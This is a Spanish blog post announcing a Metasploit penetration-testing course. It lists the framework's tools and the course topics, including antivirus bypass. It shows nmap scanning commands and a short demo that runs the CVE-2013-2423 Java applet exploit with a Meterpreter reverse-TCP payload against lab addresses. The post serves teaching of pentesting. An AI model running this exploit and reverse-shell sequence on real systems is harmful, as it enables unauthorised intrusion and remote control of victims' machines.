Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Curso de Metasploit Framework




Metasploit es un “Framework” para realizar test de intrusión desarrollado por Rapid 7. Existen 3 versiones de Metasploit, entre ellas la “Community Edition” sobre la que vamos a basar este módulo






Metasploit incorpora un “set” de herramientas (exploits, scanners, payloads, etc) que cubren perfectamente todas las fases de un test de intrusión (pentest), desde la adquisición de información y reconocimiento, hasta el descubrimiento de vulnerabilidades, su explotación y post explotación.

En este documento vamos a intentar mostrar el funcionamiento de esta herramienta mediante la realización de ejemplos prácticos. Para la realización de dichos ejemplos, se empleará una distribución Linux llamada “Kali Linux” o su predecesora “BackTrack 5r3”.

A día de hoy, Metasploit se considera la verdadera “navaja suiza del Pentester”.

Metasploit proporciona interfaces de línea de comandos, gráficas y web con más de 300 módulos de exploit a lo largo de una extensa variedad de programas, servicios y sistemas operativos.

Seguidamente podemos ir al directorio en el que se encuentra instalado Metasploit y ejecutar la consola basada en texto (msfconsole), la interfaz web (msfweb), o la interfaz gráfica (msfgui).

Metasploit consta de varias herramientas distintas:

  • msfconsole. Consola de Metasploit.
  • msfcli. Nos permite ejecutar módulos directamente sin entrar en la consola.
  • msfpayload. Para generar payloads.
  • msfencode. Permite codificar los payloads para quitar null bytes por ejemplo.
  • msfvenom. Combinación de msfpayload y msfencode en una sola herramienta.

  • Índice
  • Changelog. 
  • Introducción. 
  • Fases de un test de intrusión.
  • Comenzando a utilizar Metasploit.
  • Conectar Metasploit a una base de datos.
  • Exploits más utilizados en servidores.
  • Exploits “client side”.
  • Post-­-Explotación.
  • Modificación de exploits en Metasploit.
  • Bypass de antivirus con Metasploit
  • Automatización de tareas en Metasploit.
  • Referencias.




Ejecutando nmap desde  MSFconsole


#msf > db_nmap -sS -A 192.168.0.2
#msf > db_services
Ortros scanners de puertos:

#msf > search portscan

 

 Ejemplo CVE-2013-2423 Java 7u17 Applet RCE Metasploit Demo


use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo


6 comentarios :

Fernando dijo...

Gracias por el aporte. Una question, además de los pdf´s ¿es este el comienzo de un curso de metasploit? porque si es así sería great.

el-brujo dijo...

No, lo siento. El curso son los ficheros pdf's. :P

Fernando dijo...

Ok, gracias. De todos modos si alguien sabe de una buena serie de tutoriales para aprender a manejarse con metasploit le quedaria agradecido si me pasara los links.
Un saludo.

JaNsI Requejo dijo...

es un buen aporte, gracias por tomarte el tiempo y compartirlo. muchas gracias otra vez.

Formación Online dijo...

Muy bueno, lo incluiré en mi portal.

Un saludo :D

Kira Yagami dijo...

Muchas gracias por el aporte, apenas comienzo a usar Kali Linux =D

Publicar un comentario en la entrada

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.